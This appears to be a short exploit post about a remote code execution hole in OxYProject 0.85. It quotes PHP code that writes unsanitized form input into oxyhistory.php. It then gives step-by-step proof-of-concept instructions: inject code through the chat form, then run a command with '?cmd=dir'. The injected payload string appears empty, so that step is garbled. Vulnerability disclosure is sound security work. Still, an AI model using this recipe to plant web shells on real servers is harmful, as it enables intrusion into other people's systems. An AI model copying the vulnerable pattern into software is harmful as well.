OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip Code Vuln : ###################Ln 24################### include('oxycfg.php'); //######################################## // Editing the Chat History //######################################## $edit_file = $file['Chat_History']; $fh = fopen($edit_file, 'a') or die("Error occured when submitting your message. Back"); fwrite($fh, "" . $_POST["oxyname"] . " : " . $_POST["oxymsg"] . "
"); fclose($fh); ###################Ln 33################### In The Page "oxycfg.php" ###################Ln 33################### $file['Chat_History'] = "oxyhistory.php"; ###################Ln 23################### POC : Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php You'll see In this Page Username [?] Your message has been successfully submitted [X] Your Message Here Username Color [?] black Enter Message In The "Username" Write "Gold_M" In The "Your Message Here" Write This Code "" Afte All this Click "Enter Message" Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir # Thanx To TryagOxY